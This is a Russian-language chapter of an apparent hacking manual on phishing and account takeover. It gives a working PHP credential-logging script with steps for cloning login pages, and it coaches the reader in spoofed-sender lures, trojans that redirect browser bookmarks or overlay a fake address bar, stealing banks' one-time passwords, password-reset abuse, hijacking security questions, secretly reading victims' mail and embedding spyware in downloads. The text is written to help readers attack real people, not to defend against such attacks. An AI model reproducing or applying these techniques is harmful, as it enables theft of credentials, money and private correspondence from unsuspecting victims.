Глава 2 Подмена, фальшивка, фейк

Подделывается все что угодно - личность, электронный адрес, письма от начальства, программы в которых работает пользователь..
Пример фейка - фальшивая страницы сайта, которая выглядит в точности как
страница для входа на какой-нибудь сайт. Фейк посылает введенные в него логин и пароль на скрипт, скрипт записывает пароли в файл и пересылает жертву на какой-нибудь третий адрес, например на страницу авторизации настоящего сайта.
Регистрируемся на любом хостинге c поддержкой PHP (например, http://hop.ru) и ставим туда скрипт, наподобие этого
$f=fopen("ak.txt","a");
fwrite($f,$_GET['login']."\r\n");
fwrite($f,$_GET['password']."\r\n");
fclose($f);
header('Location: http://mail.ru');
?>
Поля login и password это поля будущего фейка они могут называться по другому соответственно именам полям ввода в html форме фейка на эти. ak.txt это файл куда запишутся пароли и имена пользователей его и скрипт фейка надо поместить на PHP хостинг и указать права записи rw-rw-rw (777). Чтобы сделать собственно фейк надо сохранить страницу авторизации нужного сайта как html файл, открыть эту страницу в блокноте, проанализировать, найти все ссылки на графику, скачать все картинки, используемые в этой странице, в коде формы с полями в свойстве action пишем http адрес нашего скрипта, а в свойстве method пишем POST. Потом помещаем фейк и все картинки на свой сайт (желательно без рекламы внизу) и далее начинается социальная инженерия. Например, нам нужно взломать почту на уа.ru. Узнаем про того кого хотим взломать как можно больше информации, поглядев на его друзей, находим с кем он давно не общался. Пишем через сервис, который подменивает обратный адрес почты, письмо якобы от лица этого друга. Пишем привет такой то и такой то, я вот тут сайт сделал, хочешь поглядеть? И даем ссылку на фейк. В странице фейка должно быть написано над полем ввода ошибка, вы не авторизованы. Жертва идет на сайт якобы друга, и попадает на наш фейк, но ей кажется, что ее просто из почты выкинуло, потому что, внешне фейк похож на почту, еще и написано - ошибка вы не авторизированны и человек естественно пытается войти снова в почту, через наш фейк. Пароли идут в наш файл, а скрипт пересылает жертву на настоящую страницу авторизации яндэкса, жертва думает да что ж такое, опять... Вводит опять пароль и попадает, наконец-то, в свою почту. Но пароль уже у нас

Представим, что у какой-нибудь девушки сегодня день рождения (или Новый год)
Используем социальную инженерию и поздравляем жертву от имени какого-то сайта, где она бывает... Узнаем e-mail жертвы, в поздравлении пишем текст поздравления и ссылку с названием - Ваш подарок находится здесь. А вместо подарка подсовываем фейк, или пишем что для просмотра подарка введите свой логин и пароль… а после кражи паролей фейком пересылаем жертву на красивую настоящую поздравительную открытку…
На Delphi совсем нетрудно написать код который отслеживает (через DDE, например) текущие адреса сайтов, вводимые в браузеры. При этом существует замечательная функция ShellExecute, которая позволяет через командную строку послать любому браузеру команду на открытие другого сайта. В принципе ничто не мешает использовать это для подмены настоящих сайтов фальшивыми - юзер вводит в строку ввода mail.ru, и как только начинает грузиться mail.ru, троян, уловив адрес, отсылает на браузер команду открыть сайт-фейк mail.ru
По адресу C:\Documents and Settings\имя_пользвателя\Application Data\Opera\Opera\speeddial.ini находится замечательный файл, в котором хранятся закладки панели быстрого запуска Оперы
Файл, открытый в блокноте имеет вид

[Speed Dial 1]
Title=http://mail.ru/
Url=http://mail.ru/
Reload Enabled=0
Reload Interval=0
Reload Only If Expired=0
.................................
Тут еще несколько подобных записей

Этот файл нельзя изменять, пока Опера открыта. Но Опера ведь не всегда открыта.
Наш вирус вполне себе может изменить значение Url, не меняя при этом Title

[Speed Dial 1]
Title=http://mail.ru/
Url=http://feikmail.ru/
Reload Enabled=0
Reload Interval=0
Reload Only If Expired=0

Так мы можем легко изменить адрес любой закладки на адрес фальшивого сайта имитирующего mail.ru и сделанному нами заранее с целью кражи паролей. После авторизации на нашем фальшивом сайте пароли запишутся нам в лог, а PHP скрипт переадресует юзера на настоящий mail.ru и в принципе даже может авторизовать его там, через GET запрос…
Ну а что мешает нам сделать самодельный браузер, закладки которого являются фальшивыми фейками на настоящие сайты? Если писать браузер самому, то вполне можно сделать так, что даже в адресной строке будут отображаться адреса не фейков, а нормальных сайтов, и после переадресации никто ничего не поймет. Более того, глядя как современные юзеры используют браузеры, я заметил, что в меню браузера при интернет серфинге они лезут максимум затем, чтобы сохранить страницу или выкачать что-то через менеджер закачек. Самое смешное если создать примитивный браузер внешне похожий на Оперу, и поддерживающий только вкладки, брожение по сети, и закачку файлов, очень долгое время никто не заметит разницы, потому что липовые пункты меню никто даже трогать не будет по причине ненадобности. А если вы впарите юзеру липовый браузер то чего уж говорить - вы обретете полный контроль над его паролями, системой и аккаунтами... Если не получилось заменить весь браузер то можно заменить адресную строку в нем, точнее не в нем, а поверх него. Создается специальное окно, видом, размерами и положением на экране соответствующее адресной строке браузера которым пользуется жертва. Эта фальшивая строка позиционируется поверх оригинальной, запускается, сворачивается, и меняет положение на экране параллельно с оригинальным браузером. Вводимые в строчку адреса вызывают их открытие в браузере через системные команды открытия адреса в браузере, но например, при вводе mail.ru жертву посылает не на mail.ru, а на наш фейковый сайт, копию mail.ru.. Пароли уходят к нам, а скрипт автоматически перенаправляет жертву на оригинальный mail.ru. Имея фальшивую адресную строку, и фальшивую строку состояния, (чтобы не палиться при загрузке страницы фейка) мы можем украсть пароли с любого сайта, на который у нас имеется фейк
Банки часто используют дополнительные одноразовых пароли, список которых выдается пользователю. Причем пароли принимаются, только в указанной последовательности: пока пароль N1 не будет использован, N2 не сработает. Но мошенники и это научились преодолевать. Пользователь заходит на страницу банка, забивает пароль. Поселившийся в его компьютере троян фейком имитирует отказ в авторизации и предлагает ввести другой пароль. Удивленный пользователь на всякий случай пытается войти по второму паролю - сработало, доступ к счету получен! Вот только получен он при вводе первого пароля. А второй, на самом деле еще не использованный, попадает в руки хакеров..
Замена программ на программы-фейки может выполняться двумя способами - либо юзверь сознательно качает и устанавливает фейк думая, что это реальная программа, либо троян втемную подменяет программу уже установленную на компьютере. Также можно искать на диске и подменять установочные файлы программ, тогда есть вероятность что рано или поздно юзверь сам скачает эти программы своим друзьям, а также при любой переустановки системы ваша программа также будет сознательно им переустановлена. Липовые программы могут либо полностью (не полностью) повторять интерфейс и функциональность оригиналов, либо просто внешне притворяться программой, а после совершения нужных хакеру действий (например, ввод пароля в фальшивый mail агент) либо выдавать кучу сообщений об ошибках, нехватке какого-то компонента ОС, либо обратно подменять себя настоящими программами. Фейковая программа может посылать команды оригинальной как, например, в случае с фальшивой адресной строкой браузера

Можно сделать примитивную программу внешне как самая новая аська или как агент почты, только при подключении она не соединяется с сервером, а скидывает
тебе на скрипт логин и пароль, после этого выдавая какую-нибудь системную ошибку для маскировки. Ее можно выложить в обменнике - и собирать пароли.

Допустим, кто-то взломал ваш агент, прочитал архив переписки и изучил стиль письма ваших друзей. Когда Вы находитесь оффлайн, логин Вашего друга добавляется в игнор, а в список контактов добавляется новый контакт с логином злоумышленника созвучным с удаленным в игнор логином вашего друга, для анкеты которого используются данные и фото друга. Очень высока вероятность, что Вы не заметите подмены, и злоумышленник, общаясь с вами от лица вашего друга, выведает у вас необходимую ему информацию. Более того, если взломать одновременно контакт какого-нибудь парня и его девушки то вполне возможно поссорить их, заменив им контакты на свой и устроив диалог с фразами, идущими через вас (man in the middle) спровоцировать ссору, так что парень будет думать, что виновата девушка и наоборот. Точно так же это можно использовать при переговорах бизнес партнеров по электронным системам сообщений вроде агента и ICQ.
Как правило, любой аккаунт, где зарегистрирован пользователь, привязан к его почте. Собираем немного информации о владельце этого мыла, а далее пишем жалобное письмо в службу поддержки почты - типа некоторое время назад мою почту увели злые люди, или как вариант - я забыл пароль. Пишем убедительно, жалобно, но уверенно, с другого адреса, созвучного первому. Тогда 60% процентов, что вам вышлют пароль на эту почту. Для того чтобы послать письмо для восстановления пароля на mail.ru достаточно собрать информацию о жертве и перейти по следующей ссылке
http://tel.mail.ru/cgi-bin/passremind?action=sendrequest&Username=логин&Domain=mail.ru

Если вы взломали почту и хотите взломать любой другой аккаунт жертвы, то просто притворитесь на нужном сайте что забыли пароль. Письмо с новым паролем, придет на взломанную почту, прочтите его и удалите это письмо так, чтобы хозяин почты ничего не заметил.

Если у вас есть пароль на чужую почту, вы всегда можете прочитать чужой архив mail агента прямо на сайте mail.ru, по умолчанию там включено сохранение сообщений (а если выключено – включите – жертва ничего не заметит). Старайтесь читать архив в то время, когда жертва спит – например, поздно ночью (рано утром)

Ссылки на хак-скрипты лучше отсылать через аську, форум, или агент чем через почту, т.к. письмо это подозрительно, а мимоходом упомянутая в разговоре ссылка такой подозрительной не кажется. Взломав почту, прежде всего, сохраните себе все контакты юзера и все его письма, а потом в оффлайне изучайте их, ища письма о регистрации на других сайтах.

Имея информацию о людях, с которыми юзер общается, мы можем немало о нем узнать. Обязательно сохраняйте и исследуйте всю их переписку. Зная, о чем они общаются, вы сможете взломать и его друзей тоже. Если умный чел давно переписывается со знакомой блондинкой, то чтобы взломать умника, сначала взломайте блондинку что будет легче, а потом от ее имени пошлите ему письмо с темой о которой они недавно говорили в переписке. А в письме ссылка соответствующая теме общения. От давней знакомой подвоха наш умный человек не ждет.

Про контрольные вопросы и прочее. Некоторые юзеры до сих пор ставят на контрольные вопросы осмысленные ответы, которые легко угадать, пообщавшись в асе или по телефону с жертвой и невзначай спросив ее, например, как зовут твоего песика или какое твое любимое блюдо. Некоторые девчонки ставят вместо пароля дату своего рождения, номер своего телефона или телефона своего парня. Еще любят создавать комбинации из букв своего имени и цифр года рождения, считая это НУ ОЧЕНЬ СЛОЖНЫМ паролем. Если вы взломали почту, первым делом измените контрольные вопросы. Пароль сразу не меняйте, вы всегда сможете сменить его, ведь даже если хозяин поменяет пароль, вы узнаете новый пароль через измененный вами контрольный вопрос. Иногда даже если юзер везде применяет разные пароли, он может применить на разных сайтах одинаковые контрольные вопросы. Создайте специально с целью взлома жертвы интересный липовый сайт, где при регистрации нужно указывать ответ на один из нескольких контрольных вопросов, среди которых вставьте первым такой же, как у вашего юзера на почте. Есть шанс, что он выберет его, и ответ будет ваш…

У современного пользователя зачастую одновременно открыто в браузере несколько вкладок. Специальным образом сформированная страница с java скриптом может открыть еще несколько новых вкладок с фейками. Закрывая их, пользователь может нечаянно ошибиться и закрыть настоящий сайт, оставив фейковую вкладку открытой и посчитав ее настоящим сайтом

Вообще любой сайт, на котором люди регистрируются, потенциальный источник информации для хакера. Создайте сайт знакомств, поиска работы или липовое фотомодельное агентство, в форме для регистрации укажите побольше пунктов и гребите информацию лопатой.. У 30-40%; юзеров пароли на ваш сайт и почту совпадут. Взломайте для начала какую нить девочку, ищущую знакомств. Спросите, зачем нам она? А вдруг у ней папа бизнесмен, и они с ним пользуются одним компом?.. Создайте с помощью CMS-шаблона небольшой полноценный сайт (форум, липовая соц.сеть с липовыми персонажами) с информацией по интересам жертвы, с регистрацией и троянами-шпионами незаметно вшитыми в каждый файл в загрузках сайта..